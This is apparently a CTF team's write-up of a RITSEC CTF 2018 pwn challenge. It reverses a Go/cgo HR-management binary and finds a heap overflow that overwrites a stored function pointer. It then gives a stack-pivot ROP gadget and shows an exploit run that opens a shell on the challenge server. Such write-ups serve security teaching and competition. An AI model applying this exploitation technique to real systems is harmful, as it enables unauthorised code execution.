
EPFL's CTF team

RITSEC CTF 2018: Yet Another HR Management Framework (Pwn 250)


Although there has been a ton of human resources management frameworks out there, fpasswd still wants to write his own framework. Check it out and SEE how that GOes!

nc fun.ritsec.club 1337

Author: fpasswd


$ file pwn2
pwn2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, Go BuildID=b489c015714bb598d34b6f4e04632de90b476a2a1, BuildID[sha1]=8683cf78a615c5820aef885b4612b71806a77b00, not stripped

The challenge binary is a large (1.4MB) 32-bit x86 executable and it’s not stripped. Let’s try running it:

$ ./pwn2
Welcome to yet another human resources management framework!
1. Create a new person
2. Edit a person
3. Print information about a person
4. Delete a person
5. This framework sucks, get me out of here!
Enter your choice:

Judging by the interface this is probably going to be a heap-based challenge: we can malloc (create a person), free (delete a person), edit some information and printing information about a person. But before we jump to conclusions, let’s have a look at the binary in a disassembler.

Function list

Some of those function names (for example cgoCheckPointer0) suggest that this is a Go program that calls some C code using cgo. Go is memory safe so we can ignore most of the binary and only look for vulnerabilities in the C functions.

The main._Cfunc_* functions all seem to be wrappers around the actual C functions, which are located at the end of the function list. For example this is the implementation of createPerson:


As we can see our guess was correct: each person is a 12 byte struct on the heap, and the first DWORD is set to the address of printPerson, another function.

After reversing all the C functions this is the picture we get:

struct person {
	void (*print_fn)(struct person *p);
	char *name;
	unsigned int age;

struct gets_info {
	void *buffer;
	size_t size;

unsigned int numPerson;
struct person *p[10];

void printPerson(struct person *my_p)
	printf("Name: %s\n", my_p->name);
	printf("Age: %u\n", my_p->age);

void createPerson(void)
	if (numPerson > 9) {
		puts("No more person for you.");
	} else {
		p[numPerson] = malloc(12);
		p[numPerson]->print_fn = printPerson;

void deletePerson(unsigned int i)

void printPersonWrapper(unsigned int i)

ssize_t myGets(struct gets_info *info)
	return read(0, info->buffer, info->size);

If we can somehow overwrite the function pointer at the beginning of a person, we can redirect execution. Let’s switch to dynamic analysis and try to see what happens when we create some people.

gef➤  r
Welcome to yet another human resources management framework!
1. Create a new person
2. Edit a person
3. Print information about a person
4. Delete a person
5. This framework sucks, get me out of here!
Enter your choice: 1

Creating a new person...
Enter name length: 1
Enter person's name: a
Enter person's age: 1

Welcome to yet another human resources management framework!
1. Create a new person
2. Edit a person
3. Print information about a person
4. Delete a person
5. This framework sucks, get me out of here!
Enter your choice: 1

Creating a new person...
Enter name length: 1
Enter person's name: a
Enter person's age: 1

Welcome to yet another human resources management framework!
1. Create a new person
2. Edit a person
3. Print information about a person
4. Delete a person
5. This framework sucks, get me out of here!
Enter your choice: ^C

gef➤  x/4x 0x081a3ca0
0x81a3ca0 <p>:  0x081a8370      0x081a8390      0x00000000      0x00000000

gef➤  x/3x 0x81a8370
0x81a8370:      0x080ebb10      0x081a8380      0x00000001

gef➤  x/3x 0x81a8390
0x81a8390:      0x080ebb10      0x081a83a0      0x00000001

Hmm, so it looks like both names and person structs are allocated on the heap (as expected) and they are interleaved like this:

0x81a8370: ---------------
           |   Person 1  |
0x81a8380: ---------------
           |   Name 1    |
0x81a8390: ---------------
           |   Person 2  |
0x81a83a0: ---------------
           |   Name 2    |

But what happens if we try to edit a person? We can guess that myGets will be used to read the new name so let’s put a breakpoint on read.

gef➤  b read
Breakpoint 1 at 0xf7e7fd10 (2 locations)
gef➤  c

Editting a person...
Enter person's index (0-based): 0
Enter new name length: 1337
Enter the new name:
Thread 1 "pwn2" hit Breakpoint 1, 0xf7f85360 in read () from /usr/lib32/libpthread.so.0

gef➤  x/4x $esp
0xffffd67c:     0x080ebc5f      0x00000000      0x081a8380      0x00000539

It looks like we’re writing into the existing name buffer for person 1 with no bounds checking at all (we’re reading 1337 bytes but the malloc chunk for name 1 is only 16 bytes). This means that we can overflow person 1’s name and overwrite person 2’s print function pointer, then print person 2 to get code execution. Let’s put that theory to test.

Enter your choice: 2

Editting a person...
Enter person's index (0-based): 0
Enter new name length: 1337

Welcome to yet another human resources management framework!
1. Create a new person
2. Edit a person
3. Print information about a person
4. Delete a person
5. This framework sucks, get me out of here!
Enter your choice: 3

Printing a person...
Enter person's index (0-based): 1

Thread 1 "pwn2" received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Great! We control EIP, now we only have to write an exploit to get code execution on the server.


The code that calls the overwritten function pointer is this:


It first pushes the address of the corrupted person struct on the stack, then calls the function pointer. After the call the stack will look like this:

esp:     |   Ret addr  |
esp + 4: |    &p[1]    |
         |     ...     |

If we can find a ROP gadget that first removes the return address from the stack and then pops the stack pointer, we can use the memory of person 2 (which we control) as our stack for a ROP chain. Since the target binary is not position- independent we don’t even need an infoleak to gain code execution. This one will do:

0x80c0620 : pop ebp ; add al, 0x89 ; pop esp ; and al, 0x30 ; add esp, 0x24 ; ret

Now that we have control of the stack, all we need to do is to write a ROP chain that places /bin/sh\0 somewhere in writable memory and invokes execve to get us a shell. I used a random spot in .bss to store /bin/sh because it’s writable and sits at a known address.

$ python2 exploit.py
[+] Opening connection to fun.ritsec.club on port 1337: Done
[*] Switching to interactive mode
$ ls
$ cat flag.txt
[*] Closed connection to fun.ritsec.club port 1337